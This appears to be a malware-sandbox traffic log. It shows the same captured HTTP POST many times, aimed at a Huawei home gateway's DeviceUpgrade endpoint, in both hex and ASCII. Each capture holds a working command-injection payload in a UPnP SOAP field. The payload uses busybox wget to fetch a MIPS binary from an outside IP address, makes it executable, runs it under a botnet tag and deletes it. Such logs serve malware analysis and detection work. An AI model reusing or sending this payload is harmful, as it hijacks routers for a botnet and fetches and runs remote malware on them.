    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
